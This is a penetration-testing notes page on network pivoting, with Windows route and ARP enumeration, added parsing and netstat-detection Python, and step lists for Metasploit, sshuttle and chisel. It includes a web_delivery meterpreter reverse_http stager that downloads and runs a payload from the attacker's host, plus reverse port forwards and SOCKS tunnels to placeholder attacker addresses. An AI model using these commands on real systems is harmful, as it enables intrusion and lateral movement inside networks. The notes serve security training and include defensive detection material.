# Pivoting

## Metasploit

### Check routes on a Windows machine

* We need to see which other networks our target machine can reach
* `route print`

  ```
  C:\Windows\system32>route print
  route print
  ===========================================================================
  Interface List
   12...08 00 27 ae c1 68 ......Intel(R) PRO/1000 MT Desktop Adapter
    1...........................Software Loopback Interface 1
  ===========================================================================

  IPv4 Route Table
  ===========================================================================
  Active Routes:
  Network Destination        Netmask          Gateway       Interface  Metric
            0.0.0.0          0.0.0.0     192.168.57.1        10.0.2.15     25
           10.0.2.0    255.255.255.0         On-link         10.0.2.15    281
          10.0.2.15  255.255.255.255         On-link         10.0.2.15    281
         10.0.2.255  255.255.255.255         On-link         10.0.2.15    281
          127.0.0.0        255.0.0.0         On-link         127.0.0.1    331
          127.0.0.1  255.255.255.255         On-link         127.0.0.1    331
    127.255.255.255  255.255.255.255         On-link         127.0.0.1    331
          224.0.0.0        240.0.0.0         On-link         127.0.0.1    331
          224.0.0.0        240.0.0.0         On-link         10.0.2.15    281
    255.255.255.255  255.255.255.255         On-link         127.0.0.1    331
    255.255.255.255  255.255.255.255         On-link         10.0.2.15    281
  ===========================================================================
  Persistent Routes:
    None

  IPv6 Route Table
  ===========================================================================
  Active Routes:
   If Metric Network Destination      Gateway
    1    331 ::1/128                  On-link
   12    281 fe80::/64                On-link
   12    281 fe80::857:534f:3bb0:8fce/128
                                      On-link
    1    331 ff00::/8                 On-link
   12    281 ff00::/8                 On-link
  ===========================================================================
  Persistent Routes:
    None
  ```
* `arp -a`

  ```
  Interface: 10.0.2.15 --- 0xc
  Internet Address      Physical Address      Type
  10.0.2.3              08-00-27-35-94-d3     dynamic   
  10.0.2.4              08-00-27-fc-72-e9     dynamic   
  10.0.2.5              08-00-27-7f-90-90     dynamic   
  10.0.2.8              08-00-27-1d-d2-98     dynamic   
  10.0.2.255            ff-ff-ff-ff-ff-ff     static    
  192.168.57.1          52-54-00-12-35-00     dynamic   
  224.0.0.22            01-00-5e-00-00-16     static    
  224.0.0.251           01-00-5e-00-00-fb     static    
  224.0.0.252           01-00-5e-00-00-fc     static    
  239.255.255.250       01-00-5e-7f-ff-fa     static    
  255.255.255.255       ff-ff-ff-ff-ff-ff     static    
  ```
* Now that we have other interesting IPs, we can try to reach them through the session
* We can run a port scan against one of these IPs
* `use auxiliary/scanner/portscan/tcp`
* `set rhosts 10.0.2.5`
* `set ports 445`
* `run`

  ```
  [+] 10.0.2.5:             - 10.0.2.5:445 - TCP OPEN
  [*] 10.0.2.5:             - Scanned 1 of 1 hosts (100% complete)
  [*] Auxiliary module execution completed
  ```

  We could of course have specified more ports, which turns this module into a handy nmap-like scanner through the pivot.
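
To read these two tables programmatically rather than by eye, here is an added Python example (not part of the original notes): it parses the IPv4 table of `route print` and the output of `arp -a` shown above and reports the directly connected subnets, the default gateway, the neighbours that actually answered ARP, and any neighbour that sits outside every connected subnet (here `192.168.57.1`, which hints at a second network segment). The function names and the summary keys are my own.

```python
import ipaddress
import re

# Sample input: the IPv4 part of the `route print` output and the `arp -a` output shown above.
ROUTE_PRINT = """\
IPv4 Route Table
===========================================================================
Active Routes:
Network Destination        Netmask          Gateway       Interface  Metric
          0.0.0.0          0.0.0.0     192.168.57.1        10.0.2.15     25
         10.0.2.0    255.255.255.0         On-link         10.0.2.15    281
        10.0.2.15  255.255.255.255         On-link         10.0.2.15    281
       10.0.2.255  255.255.255.255         On-link         10.0.2.15    281
        127.0.0.0        255.0.0.0         On-link         127.0.0.1    331
        127.0.0.1  255.255.255.255         On-link         127.0.0.1    331
  127.255.255.255  255.255.255.255         On-link         127.0.0.1    331
        224.0.0.0        240.0.0.0         On-link         127.0.0.1    331
        224.0.0.0        240.0.0.0         On-link         10.0.2.15    281
  255.255.255.255  255.255.255.255         On-link         127.0.0.1    331
  255.255.255.255  255.255.255.255         On-link         10.0.2.15    281
===========================================================================
Persistent Routes:
  None

IPv6 Route Table
===========================================================================
Active Routes:
 If Metric Network Destination      Gateway
  1    331 ::1/128                  On-link
"""

ARP_A = """\
Interface: 10.0.2.15 --- 0xc
  Internet Address      Physical Address      Type
  10.0.2.3              08-00-27-35-94-d3     dynamic
  10.0.2.4              08-00-27-fc-72-e9     dynamic
  10.0.2.5              08-00-27-7f-90-90     dynamic
  10.0.2.8              08-00-27-1d-d2-98     dynamic
  10.0.2.255            ff-ff-ff-ff-ff-ff     static
  192.168.57.1          52-54-00-12-35-00     dynamic
  224.0.0.22            01-00-5e-00-00-16     static
  224.0.0.251           01-00-5e-00-00-fb     static
  224.0.0.252           01-00-5e-00-00-fc     static
  239.255.255.250       01-00-5e-7f-ff-fa     static
  255.255.255.255       ff-ff-ff-ff-ff-ff     static
"""

# One `arp -a` row: IPv4 address, MAC in Windows dash notation, entry type.
ARP_ROW = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-fA-F]{2}(?:-[0-9a-fA-F]{2}){5})\s+(dynamic|static)\s*$"
)


def parse_ipv4_routes(text):
    """Return the rows of the IPv4 'Active Routes' table; headers, separators and the IPv6 table are skipped."""
    routes = []
    in_ipv4 = False
    for line in text.splitlines():
        stripped = line.strip()
        if stripped.startswith("IPv4 Route Table"):
            in_ipv4 = True
            continue
        if stripped.startswith("IPv6 Route Table"):
            break
        parts = stripped.split()
        if not in_ipv4 or len(parts) != 5:
            continue
        dest, mask, gateway, iface, metric = parts
        try:
            network = ipaddress.ip_network(f"{dest}/{mask}", strict=False)  # dotted netmask is accepted
            ipaddress.ip_address(iface)
            routes.append({"network": network, "gateway": gateway,
                           "interface": iface, "metric": int(metric)})
        except ValueError:
            continue  # not a route row
    return routes


def parse_arp(text):
    """Return (ip, mac, type) tuples for every entry in `arp -a` output."""
    return [m.groups() for m in map(ARP_ROW.match, text.splitlines()) if m]


def summarize(routes, arp_entries):
    """Derive what matters for pivoting: connected subnets, default gateway, live neighbours."""
    connected, default_gateway = [], None
    for route in routes:
        net = route["network"]
        if net.prefixlen == 0:
            default_gateway = route["gateway"]  # the 0.0.0.0/0 row
        elif (route["gateway"] == "On-link" and net.prefixlen < 32
              and not (net.is_loopback or net.is_multicast)):
            connected.append(net)  # a real directly connected subnet, not a host/broadcast route
    live_hosts, offlink = [], []
    for ip_str, _mac, kind in arp_entries:
        ip = ipaddress.ip_address(ip_str)
        if kind != "dynamic" or ip.is_multicast:
            continue  # static entries are broadcast/multicast addresses, not hosts
        live_hosts.append(ip_str)
        if not any(ip in net for net in connected):
            offlink.append(ip_str)  # answered ARP although no connected subnet contains it
    return {"connected": [str(n) for n in connected], "default_gateway": default_gateway,
            "live_hosts": live_hosts, "offlink_neighbors": offlink}


if __name__ == "__main__":
    for key, value in summarize(parse_ipv4_routes(ROUTE_PRINT), parse_arp(ARP_A)).items():
        print(f"{key}: {value}")
```

Only dynamic ARP entries count as live neighbours: the static `ff-ff-…` and `01-00-5e-…` entries are broadcast and multicast addresses, not hosts. The same parser works on the output of any Windows host, which also makes it useful when reviewing evidence collected during an engagement or an incident.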

## Reverse port forwarding and session passing with Metasploit from an initial Covenant shell

* Assume we already have a shell on the target, for instance a Covenant grunt
* We generate a payload with Metasploit through web delivery (stealthier, because the stager traffic passes as HTTP traffic)
* `use exploit/multi/script/web_delivery`
* `set target 2` (for powershell)
* `set payload windows/x64/meterpreter/reverse_http`
* `set lhost` to the IP of your attacking machine
* `set lport` to a port of your choice
* `exploit -j`
* Now we can copy the generated command and paste it into our grunt in Covenant
* Metasploit should now have opened a meterpreter session
* We can identify the interface (and subnet) to pivot through with `ipconfig`
* `run autoroute -s 192.168.16.0/24`
* We can check it has been added using `run autoroute -p`
* We can now set up a reverse port forward
* `portfwd add -R -p 1234 -l 443 -L ATTACKING-MACHINE-IP`
* We can check it has been added using `portfwd`
* We can background our session with CTRL-Z
* We will set up a SOCKS proxy: `use auxiliary/server/socks4a`
* We need to check which port proxychains uses in `/etc/proxychains4.conf` so that the proxy listens on the same one
* `set srvport 9050`
* We can check our jobs using `jobs`
* We can kill the web delivery job that we no longer need: `jobs -k ID-OF-JOB`
* We now need to create a listener in Covenant that will interact with the port forward set previously: `1 192.168.3.28:443 0.0.0.0:1234 Reverse`
* BindAddress can stay at 0.0.0.0, BindPort should be 443, ConnectPort should be 1234 and ConnectAddress is the IP of our victim (pivot) machine.
* Using proxychains, we should now be able to reach the other machines on the network of the initial machine, which now has a route to our attacking machine
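
From the defender's side, the steps above leave a distinctive footprint on the pivot host: one process owns a new listening TCP port (1234 here) and at the same time holds an outbound HTTP session to the attacking machine. The added Python example below (not from the original notes nor from Metasploit or Covenant) parses `netstat -ano` output and reports every listener missing from a known-good baseline together with the established peers of the owning PID. The netstat sample, the baseline ports and the addresses (`203.0.113.10`, `192.168.16.22`, PID 4120) are constructed for the example.

```python
import re

# Constructed sample of `netstat -ano` on the pivot host (not from the page): PID 4120 stands for
# the implant, 203.0.113.10 for the attacking machine, 192.168.16.0/24 for the internal network.
NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:1234           0.0.0.0:0              LISTENING       4120
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1108
  TCP    10.0.2.15:49731        203.0.113.10:80        ESTABLISHED     4120
  TCP    192.168.16.5:1234      192.168.16.22:50322    ESTABLISHED     4120
  UDP    0.0.0.0:5355           *:*                                    1420
"""

# Ports this host is expected to listen on; a real baseline comes from a clean snapshot of the same host.
BASELINE_PORTS = {135, 445, 3389}

# One netstat row: proto, local addr:port, foreign addr:port, optional state (UDP has none), PID.
SOCKET_ROW = re.compile(
    r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+):(\S+)\s+(?:(\S+)\s+)?(\d+)\s*$"
)


def parse_netstat(text):
    """Turn `netstat -ano` rows into dicts; header lines do not match and are ignored."""
    sockets = []
    for line in text.splitlines():
        m = SOCKET_ROW.match(line)
        if not m:
            continue
        proto, laddr, lport, raddr, rport, state, pid = m.groups()
        sockets.append({"proto": proto, "local": laddr, "lport": int(lport), "remote": raddr,
                        "rport": rport, "state": state or "", "pid": int(pid)})
    return sockets


def unexpected_listeners(sockets, baseline_ports):
    """TCP listeners absent from the baseline, as sorted (port, pid) pairs."""
    return sorted({(s["lport"], s["pid"]) for s in sockets
                   if s["proto"] == "TCP" and s["state"] == "LISTENING"
                   and s["lport"] not in baseline_ports})


def established_peers(sockets, pid):
    """Remote endpoints a PID is talking to; a new listener whose owner also has an
    outbound session is the classic signature of a process bridging two networks."""
    return sorted(f'{s["remote"]}:{s["rport"]}' for s in sockets
                  if s["pid"] == pid and s["state"] == "ESTABLISHED")


def report(text, baseline_ports):
    """Pair every unexpected listener with the peers of its owning process."""
    sockets = parse_netstat(text)
    return {f"{port}/tcp pid {pid}": established_peers(sockets, pid)
            for port, pid in unexpected_listeners(sockets, baseline_ports)}


if __name__ == "__main__":
    for listener, peers in report(NETSTAT, BASELINE_PORTS).items():
        print(f"unexpected listener {listener}: established to {peers}")
```

On the sample this flags `1234/tcp` owned by PID 4120, which is simultaneously connected to an external web server and to an internal host; the next step is to resolve the PID to its image path and parent with `tasklist` or Sysmon event data. Comparing against a per-host baseline rather than a fixed "known bad" port list is what catches a forward on an arbitrary port like 1234.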

## sshuttle

Let's say you got a shell on a machine and this machine has local access to another one (let's call it machine 2). sshuttle will let you reach machine 2 from your own network by acting as a transparent proxy over SSH.

```
sshuttle --listen 0.0.0.0 -e "ssh -i keyfile" -r user@IP-OF-YOUR-TARGET-MACHINE IP-OF-SUBNET-ACCESSIBLE-THROUGH-MACHINE2/24 -v
# example
sshuttle --listen 0.0.0.0 -e "ssh -i key" -r root@10.10.120.117 172.12.1.0/24 -v
```

## Chisel

* If you have a shell on a machine that has a port open only locally, you can forward that port to your own machine using chisel; this is called **port forwarding**. In our example we want to reach port 445 of the target machine, which is only open locally, and afterwards interact with it from your Kali on your own port 445:
  * On my Kali: `chisel server --reverse` (it is going to listen on port 8080)
  * On the target: `.\chisel.exe client KALI-IP:8080 R:445:127.0.0.1:445`

* You can check out examples of use of chisel on the [chatterbox writeup](/pentips/writeups/htbwriteups/htb-chatterbox.md) or [buffer overflow windows](/pentips/binary-exploitation/buffer-overflow-stack-win86.md)

### Pivoting with Chisel

* From my kali `chisel server --reverse`
* From the victim machine `.\chisel.exe client IP-OF-KALI:8080 R:1080:socks`
* In your `/etc/proxychains4.conf` add this line: `socks5 127.0.0.1 1080`

## Resources

{% embed url="<https://orangecyberdefense.com/fr/insights/blog/ethical_hacking/etat-de-lart-du-pivoting-reseau-en-2019/>" %}
Amazing resource about pivoting, but only in French; it can easily be read with Google Translate
{% endembed %}

{% embed url="<https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course>" %}
TCM Security Academy - Practical Ethical Hacking - The Complete Course
{% endembed %}

